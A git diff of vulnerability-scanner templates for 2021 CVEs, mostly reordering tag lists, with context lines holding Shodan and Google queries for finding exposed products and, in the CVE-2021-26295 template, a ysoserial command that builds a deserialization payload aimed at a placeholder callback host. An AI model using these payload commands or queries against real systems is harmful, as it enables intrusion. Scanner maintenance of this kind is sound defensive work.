+++ b/http/cves/2021/CVE-2021-24947.yaml
@@ -25,7 +25,7 @@ info:
vendor: thinkupthemes
product: responsive_vector_maps
framework: wordpress
- tags: cve,authenticated,wpscan,cve2021,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes
+ tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml
index d85c27eb15..eeaed6e70d 100644
--- a/http/cves/2021/CVE-2021-24970.yaml
+++ b/http/cves/2021/CVE-2021-24970.yaml
@@ -27,7 +27,7 @@ info:
vendor: plugins360
product: all-in-one_video_gallery
framework: wordpress
- tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated,plugins360
+ tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml
index b9923a1907..ceeb0d3ef2 100644
--- a/http/cves/2021/CVE-2021-24979.yaml
+++ b/http/cves/2021/CVE-2021-24979.yaml
@@ -26,7 +26,7 @@ info:
product: paid_memberships_pro
framework: wordpress
publicwww-query: /wp-content/plugins/paid-memberships-pro/
- tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios
+ tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml
index 1e9e388a54..a7a2c6f8bf 100644
--- a/http/cves/2021/CVE-2021-24987.yaml
+++ b/http/cves/2021/CVE-2021-24987.yaml
@@ -25,7 +25,7 @@ info:
vendor: heateor
product: super_socializer
framework: wordpress
- tags: cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress,heateor
+ tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml
index d4e1a1739e..c97c26e38c 100644
--- a/http/cves/2021/CVE-2021-24997.yaml
+++ b/http/cves/2021/CVE-2021-24997.yaml
@@ -27,7 +27,7 @@ info:
vendor: wp-guppy
product: wp_guppy
framework: wordpress
- tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan,wp-guppy
+ tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml
index 015d98bbed..670af6d744 100644
--- a/http/cves/2021/CVE-2021-25003.yaml
+++ b/http/cves/2021/CVE-2021-25003.yaml
@@ -28,7 +28,7 @@ info:
vendor: wptaskforce
product: wpcargo_track_\&_trace
framework: wordpress
- tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce
+ tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml
index 67b1c02405..4c6aa157b9 100644
--- a/http/cves/2021/CVE-2021-25008.yaml
+++ b/http/cves/2021/CVE-2021-25008.yaml
@@ -25,7 +25,7 @@ info:
vendor: codesnippets
product: code_snippets
framework: wordpress
- tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,codesnippets
+ tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml
index fe48345da6..f998e22065 100644
--- a/http/cves/2021/CVE-2021-25016.yaml
+++ b/http/cves/2021/CVE-2021-25016.yaml
@@ -26,7 +26,7 @@ info:
product: chaty
framework: wordpress
publicwww-query: "/wp-content/plugins/chaty/"
- tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty,premio
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml
index f412aef5b4..baa6296841 100644
--- a/http/cves/2021/CVE-2021-25028.yaml
+++ b/http/cves/2021/CVE-2021-25028.yaml
@@ -23,7 +23,7 @@ info:
vendor: tri
product: event_tickets
framework: wordpress
- tags: wordpress,redirect,wp-plugin,eventtickets,wpscan,cve,cve2021,tri
+ tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml
index f497ba8925..c03419f30f 100644
--- a/http/cves/2021/CVE-2021-25033.yaml
+++ b/http/cves/2021/CVE-2021-25033.yaml
@@ -26,7 +26,7 @@ info:
vendor: noptin
product: noptin
framework: wordpress
- tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin
+ tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml
index be187b10fd..7d433b3c09 100644
--- a/http/cves/2021/CVE-2021-25052.yaml
+++ b/http/cves/2021/CVE-2021-25052.yaml
@@ -26,7 +26,7 @@ info:
vendor: wow-company
product: button_generator
framework: wordpress
- tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress,wow-company
+ tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml
index 5280b99151..9474aeac94 100644
--- a/http/cves/2021/CVE-2021-25055.yaml
+++ b/http/cves/2021/CVE-2021-25055.yaml
@@ -27,7 +27,7 @@ info:
vendor: feedwordpress_project
product: feedwordpress
framework: wordpress
- tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project
+ tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml
index a7d80c35e4..efc96f004d 100644
--- a/http/cves/2021/CVE-2021-25063.yaml
+++ b/http/cves/2021/CVE-2021-25063.yaml
@@ -25,7 +25,7 @@ info:
vendor: cf7skins
product: contact_form_7_skins
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml
index 023ba7922c..3a7351fe4c 100644
--- a/http/cves/2021/CVE-2021-25065.yaml
+++ b/http/cves/2021/CVE-2021-25065.yaml
@@ -27,7 +27,7 @@ info:
product: smash_balloon_social_post_feed
framework: wordpress
publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
- tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml
index 19e1293e65..3ae351cec8 100644
--- a/http/cves/2021/CVE-2021-25067.yaml
+++ b/http/cves/2021/CVE-2021-25067.yaml
@@ -27,7 +27,7 @@ info:
vendor: pluginops
product: landing_page
framework: wordpress
- tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add,pluginops
+ tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml
index 0e466e3ab9..984d76c8e7 100644
--- a/http/cves/2021/CVE-2021-25074.yaml
+++ b/http/cves/2021/CVE-2021-25074.yaml
@@ -25,7 +25,7 @@ info:
vendor: webp_converter_for_media_project
product: webp_converter_for_media
framework: wordpress
- tags: redirect,wp-plugin,webpconverter,wpscan,cve,cve2021,wordpress,webp_converter_for_media_project
+ tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml
index b50fb608af..b1b5e9b58b 100644
--- a/http/cves/2021/CVE-2021-25075.yaml
+++ b/http/cves/2021/CVE-2021-25075.yaml
@@ -26,7 +26,7 @@ info:
vendor: wpdevart
product: duplicate_page_or_post
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpdevart
+ tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml
index d53c182a5f..022e2941e1 100644
--- a/http/cves/2021/CVE-2021-25078.yaml
+++ b/http/cves/2021/CVE-2021-25078.yaml
@@ -27,7 +27,7 @@ info:
vendor: wpaffiliatemanager
product: affiliates_manager
framework: wordpress
- tags: cve,wp,wordpress,authenticated,cve2021,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager
+ tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml
index d676dbeb15..4abf5c318d 100644
--- a/http/cves/2021/CVE-2021-25079.yaml
+++ b/http/cves/2021/CVE-2021-25079.yaml
@@ -27,7 +27,7 @@ info:
product: contact_form_entries
framework: wordpress
google-query: inurl:"/wp-content/plugins/contact-form-entries/"
- tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks
+ tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml
index 4fce062510..d933edc515 100644
--- a/http/cves/2021/CVE-2021-25085.yaml
+++ b/http/cves/2021/CVE-2021-25085.yaml
@@ -28,7 +28,7 @@ info:
vendor: pluginus
product: woocommerce_products_filter
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan,pluginus
+ tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml
index f071bcdf28..7d86592fbe 100644
--- a/http/cves/2021/CVE-2021-25099.yaml
+++ b/http/cves/2021/CVE-2021-25099.yaml
@@ -29,7 +29,7 @@ info:
vendor: givewp
product: givewp
framework: wordpress
- tags: xss,cve2021,wp,give,wordpress,cve,wp-plugin,unauth,wpscan,givewp
+ tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml
index c49f1fc24c..6b5b284bb8 100644
--- a/http/cves/2021/CVE-2021-25111.yaml
+++ b/http/cves/2021/CVE-2021-25111.yaml
@@ -25,7 +25,7 @@ info:
vendor: english_wordpress_admin_project
product: english_wordpress_admin
framework: wordpress
- tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve,english_wordpress_admin_project
+ tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml
index 7e767f2fee..29c94fa7e2 100644
--- a/http/cves/2021/CVE-2021-25112.yaml
+++ b/http/cves/2021/CVE-2021-25112.yaml
@@ -27,7 +27,7 @@ info:
vendor: i-plugins
product: whmcs_bridge
framework: wordpress
- tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins
+ tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml
index b6d64bd09f..03b2bcc90e 100644
--- a/http/cves/2021/CVE-2021-25114.yaml
+++ b/http/cves/2021/CVE-2021-25114.yaml
@@ -30,7 +30,7 @@ info:
product: paid_memberships_pro
framework: wordpress
google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
- tags: wp-plugin,wp,sqli,paid-memberships-pro,wpscan,cve,cve2021,wordpress,strangerstudios
+ tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml
index 6a33cecbfe..a1bb231d31 100644
--- a/http/cves/2021/CVE-2021-25118.yaml
+++ b/http/cves/2021/CVE-2021-25118.yaml
@@ -25,7 +25,7 @@ info:
vendor: yoast
product: yoast_seo
framework: wordpress
- tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp,yoast
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml
index 7fc1d078f1..244710256d 100644
--- a/http/cves/2021/CVE-2021-25120.yaml
+++ b/http/cves/2021/CVE-2021-25120.yaml
@@ -24,7 +24,7 @@ info:
vendor: easysocialfeed
product: easy_social_feed
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed
+ tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml
index 516f9f8f88..b2f13513ba 100644
--- a/http/cves/2021/CVE-2021-25296.yaml
+++ b/http/cves/2021/CVE-2021-25296.yaml
@@ -30,7 +30,7 @@ info:
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
- tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev,nagios
+ tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml
index 593bdd9622..c7c6115e84 100644
--- a/http/cves/2021/CVE-2021-25297.yaml
+++ b/http/cves/2021/CVE-2021-25297.yaml
@@ -30,7 +30,7 @@ info:
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
- tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev,nagios
+ tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml
index 8596db30f3..f9060e5105 100644
--- a/http/cves/2021/CVE-2021-25298.yaml
+++ b/http/cves/2021/CVE-2021-25298.yaml
@@ -30,7 +30,7 @@ info:
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
- tags: packetstorm,oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev,nagios
+ tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml
index 9946a9cc95..3e1a4c40d3 100644
--- a/http/cves/2021/CVE-2021-25299.yaml
+++ b/http/cves/2021/CVE-2021-25299.yaml
@@ -28,7 +28,7 @@ info:
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
- tags: cve,cve2021,nagios,nagiosxi,xss,authenticated
+ tags: cve2021,cve,nagios,nagiosxi,xss,authenticated
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml
index 7efb979fd6..3e4a302b53 100644
--- a/http/cves/2021/CVE-2021-25646.yaml
+++ b/http/cves/2021/CVE-2021-25646.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: apache
product: druid
- tags: cve,cve2021,apache,rce,druid
+ tags: cve2021,cve,apache,rce,druid
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml
index f6cbdaedea..9869a566bd 100644
--- a/http/cves/2021/CVE-2021-25864.yaml
+++ b/http/cves/2021/CVE-2021-25864.yaml
@@ -26,7 +26,7 @@ info:
product: huemagic
framework: node.js
shodan-query: title:"NODE-RED"
- tags: cve,cve2021,huemagic,lfi,dgtl,node.js
+ tags: cve2021,cve,huemagic,lfi,dgtl,node.js
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml
index 8621f055ef..399434ae91 100644
--- a/http/cves/2021/CVE-2021-25899.yaml
+++ b/http/cves/2021/CVE-2021-25899.yaml
@@ -27,7 +27,7 @@ info:
vendor: void
product: aurall_rec_monitor
shodan-query: html:"AURALL"
- tags: cve,cve2021,sqli,void,aurall
+ tags: cve2021,cve,sqli,void,aurall
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml
index f243a01b34..8ab5c8d840 100644
--- a/http/cves/2021/CVE-2021-26084.yaml
+++ b/http/cves/2021/CVE-2021-26084.yaml
@@ -27,7 +27,7 @@ info:
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
- tags: cve,cve2021,rce,confluence,injection,ognl,kev,atlassian
+ tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml
index cfd93f3dd6..eb59a4456d 100644
--- a/http/cves/2021/CVE-2021-26085.yaml
+++ b/http/cves/2021/CVE-2021-26085.yaml
@@ -27,7 +27,7 @@ info:
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
- tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive
+ tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml
index 705903edb3..6d06db4e69 100644
--- a/http/cves/2021/CVE-2021-26086.yaml
+++ b/http/cves/2021/CVE-2021-26086.yaml
@@ -26,7 +26,7 @@ info:
vendor: atlassian
product: jira_data_center
shodan-query: http.component:"Atlassian Jira"
- tags: lfi,packetstorm,cve,cve2021,jira,intrusive,atlassian
+ tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml
index cfc55c310e..24ac9be1d2 100644
--- a/http/cves/2021/CVE-2021-26292.yaml
+++ b/http/cves/2021/CVE-2021-26292.yaml
@@ -17,7 +17,7 @@ info:
vendor: AfterLogic
product: AfterLogic Aurora & WebMail
fofa-query: "X-Server: AfterlogicDAVServer"
- tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic
+ tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml
index 2367e49098..1fb523f6e3 100644
--- a/http/cves/2021/CVE-2021-26294.yaml
+++ b/http/cves/2021/CVE-2021-26294.yaml
@@ -23,7 +23,7 @@ info:
vendor: afterlogic
product: aurora
fofa-query: "X-Server: AfterlogicDAVServer"
- tags: cve,cve2021,afterlogic,exposure,AfterLogic
+ tags: cve2021,cve,afterlogic,exposure,AfterLogic
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml
index 06942a1a19..38ab72fad8 100644
--- a/http/cves/2021/CVE-2021-26295.yaml
+++ b/http/cves/2021/CVE-2021-26295.yaml
@@ -32,7 +32,7 @@ info:
product: ofbiz
shodan-query: "OFBiz.Visitor="
ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex
- tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce
+ tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml
index d7e81303b4..099e1004dc 100644
--- a/http/cves/2021/CVE-2021-26475.yaml
+++ b/http/cves/2021/CVE-2021-26475.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: eprints
product: eprints
- tags: cve,cve2021,xss,eprints,intrusive
+ tags: cve2021,cve,xss,eprints,intrusive
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml
index 5840f63c30..55243ce589 100644
--- a/http/cves/2021/CVE-2021-26598.yaml
+++ b/http/cves/2021/CVE-2021-26598.yaml
@@ -27,7 +27,7 @@ info:
vendor: impresscms
product: impresscms
shodan-query: http.html:"ImpressCMS"
- tags: hackerone,cve,cve2021,impresscms,unauth,cms
+ tags: cve,cve2021,hackerone,impresscms,unauth,cms
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml
index 6180173599..e7e25236b5 100644
--- a/http/cves/2021/CVE-2021-26702.yaml
+++ b/http/cves/2021/CVE-2021-26702.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: eprints
product: eprints
- tags: cve,cve2021,xss,eprints
+ tags: cve2021,cve,xss,eprints
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml
index ae9983170b..bd4fc924c7 100644
--- a/http/cves/2021/CVE-2021-26710.yaml
+++ b/http/cves/2021/CVE-2021-26710.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: redwood
product: report2web
- tags: cve,cve2021,redwood,xss
+ tags: cve2021,cve,redwood,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml
index 725f1c53d8..f95e8ff734 100644
--- a/http/cves/2021/CVE-2021-26723.yaml
+++ b/http/cves/2021/CVE-2021-26723.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: jenzabar
product: jenzabar
- tags: packetstorm,cve,cve2021,jenzabar,xss
+ tags: cve2021,cve,packetstorm,jenzabar,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml
index 03387353fa..63428d4a13 100644
--- a/http/cves/2021/CVE-2021-26812.yaml
+++ b/http/cves/2021/CVE-2021-26812.yaml
@@ -25,7 +25,7 @@ info:
vendor: jitsi
product: meet
framework: moodle
- tags: cve,cve2021,moodle,jitsi,xss,plugin
+ tags: cve2021,cve,moodle,jitsi,xss,plugin
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml
index 0cdbd6698e..68833826ff 100644
--- a/http/cves/2021/CVE-2021-26855.yaml
+++ b/http/cves/2021/CVE-2021-26855.yaml
@@ -27,7 +27,7 @@ info:
vendor: microsoft
product: exchange_server
shodan-query: vuln:CVE-2021-26855
- tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev
+ tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml
index 98eeddd419..b6a0121d5f 100644
--- a/http/cves/2021/CVE-2021-27124.yaml
+++ b/http/cves/2021/CVE-2021-27124.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system,doctor_appointment_system_project
+ tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml
index 3852e6ca8b..81368b91c0 100644
--- a/http/cves/2021/CVE-2021-27132.yaml
+++ b/http/cves/2021/CVE-2021-27132.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: sercomm
product: agcombo_vd625_firmware
- tags: cve,cve2021,crlf,injection,sercomm
+ tags: cve2021,cve,crlf,injection,sercomm,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml
index 6c4ecc0816..7cfccb856b 100644
--- a/http/cves/2021/CVE-2021-27309.yaml
+++ b/http/cves/2021/CVE-2021-27309.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: csphere
product: clansphere
- tags: cve,cve2021,clansphere,xss,cms,unauth,csphere
+ tags: cve2021,cve,clansphere,xss,cms,unauth,csphere
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml
index 20725cc620..1edba5c543 100644
--- a/http/cves/2021/CVE-2021-27310.yaml
+++ b/http/cves/2021/CVE-2021-27310.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: csphere
product: clansphere
- tags: xss,cve,cve2021,clansphere,csphere
+ tags: cve2021,cve,xss,clansphere,csphere
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml
index 0b220fd078..577233066c 100644
--- a/http/cves/2021/CVE-2021-27314.yaml
+++ b/http/cves/2021/CVE-2021-27314.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
+ tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml
index 2d6e57ea30..ac6a17cf2f 100644
--- a/http/cves/2021/CVE-2021-27315.yaml
+++ b/http/cves/2021/CVE-2021-27315.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
+ tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml
index 3508a942a3..86d1dc92be 100644
--- a/http/cves/2021/CVE-2021-27316.yaml
+++ b/http/cves/2021/CVE-2021-27316.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
+ tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml
index 1212f12465..22eb106a43 100644
--- a/http/cves/2021/CVE-2021-27319.yaml
+++ b/http/cves/2021/CVE-2021-27319.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system,doctor_appointment_system_project
+ tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml
index 92be1a6282..2294a06ebe 100644
--- a/http/cves/2021/CVE-2021-27320.yaml
+++ b/http/cves/2021/CVE-2021-27320.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
- tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
+ tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml
index b6e9883025..1f066097de 100644
--- a/http/cves/2021/CVE-2021-27330.yaml
+++ b/http/cves/2021/CVE-2021-27330.yaml
@@ -29,7 +29,7 @@ info:
vendor: triconsole
product: datepicker_calendar
google-query: intitle:TriConsole.com - PHP Calendar Date Picker
- tags: xss,edb,cve,cve2021,triconsole
+ tags: cve2021,cve,xss,edb,triconsole
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml
index 2ee9310909..611f3e9ec4 100644
--- a/http/cves/2021/CVE-2021-27358.yaml
+++ b/http/cves/2021/CVE-2021-27358.yaml
@@ -28,7 +28,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: cve,cve2021,grafana,unauth
+ tags: cve2021,cve,grafana,unauth
http:
- raw:
